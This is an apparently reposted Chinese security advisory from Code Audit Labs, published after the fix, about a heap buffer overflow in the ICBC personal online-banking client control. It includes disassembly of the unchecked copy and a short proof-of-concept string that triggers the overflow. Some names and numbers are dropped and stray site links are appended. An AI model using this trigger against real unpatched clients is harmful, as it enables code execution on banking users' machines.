您当前的位置: 首页 > 军事

请下载新版工行个人银

2018-10-29 12:30:11

请下载新版工行个人银

[漏洞编号]

CAL_

[影响版本]

l 1.0.0.2或以前

[公告]

翰海源代码审计实验室在工行个人银里发现一个高威胁的安全漏洞,可导致攻击者执行任意代码,并将此漏洞上报给工行珠海开发中心。7月底工行个人银已修复该漏洞并发布了新的个人银版本,考虑到工行银的使用度和客户1DAY的修复时间,我们现在再发布公告,望没有安装新版本工行银的用户及时安装新版本工行银以避免威胁

[漏洞细节]

该漏洞存是在于l的一个缓冲区溢出,ClientBinding存在一个BD接口,个参数代表一个路径,和一起拼接成一个路径,但是系统对这个路径只固定分配了0×400大小的堆内存

push 0×400

a e call ClientBinding!Gcrv+0×99c0 ()

f 83c404 add esp,0×4

8bf0 mov esi,eax

但是在拷贝数据的时候,是根据参数1的真实长度来拷贝的,而并没有检测是否大于0X400,因此直接导致了一个堆溢出

76f7 jbe ClientBinding+0×153c (c)

8bce mov ecx,esi

2bc6 sub eax,esi

8da lea esp,[esp]

8a1401 mov dl,[ecx+eax] ds:0023:014d63d3=6b

8811 mov [ecx],dl

41 inc ecx

83ef01 sub edi,0×1

75f5 jnz ClientBinding+0×1550 ()

之后,在WINDOWS XP的系统上,会直接在HEAPFREE里对一个覆盖的指针地址进行写入,由于该地址来源于攻击者覆盖的地址,攻击者可以任意构造地址写入。

7c9308ee 8908 mov [eax],ecx

7c9308f0 895004 mov [eax+0x4],edx

7c9308f3 8902 mov [edx],eax ds:0023:=????????

7c9308f5 894104 mov [ecx+0x4],eax

7c9308f8 56 push esi

7c9308f9 8b75c8 mov esi,[ebp-0x38]

继续执行,则向一个攻击者可控的地址写入当前内容地址,由于是攻击者可控的地址,该漏洞是一个非常容易利用的漏洞

[验证POC]

Str=”abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv

wxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNO

PQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ

89abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw

xyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNO

PQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ

89abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv

wxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM

NOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123

456789vabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop

qrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGH

IJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW

XYZabcdefghijklmnopqrAAAstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZa

bcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqstuvw

xyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKL

MNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY

Z″;(Str, 0)

[老版本验证下载地址]

该版本用于验证此安全漏洞

[工行新版本个人银下载地址]

[感谢]

感谢工行对漏洞报告的重视和及时修复

[时间线]

6月23号:翰海源发现该高威漏洞

6月30号:翰海源向珠海工行开发中心报告该漏洞

7月23号:工行银发布新的银修复该漏洞

8月21号: 翰海源公告

About Code Audit Labs:

=====================

Code Audit Labs是南京翰海源信息技术有限公司的代码审计部门,公司是由国际安全研究人员在中国南京创办一家提供专业的安全测试产品/服务/咨询培训 的安全公司.旨在为各家软硬件生产厂商,行业用户提供专业的高覆盖可度量的安全测试,帮助他们改进自身产品和系统的安全.我们希望为信息产业在开发过程之中就打造起信息安全的基石,提供安全质量,并凭借着为企业带来的价值而成为国际专业的安全测试产品和服务的提供商

中建大公馆
珠江颐德公馆
旋进旋涡流量计
推荐阅读
图文聚焦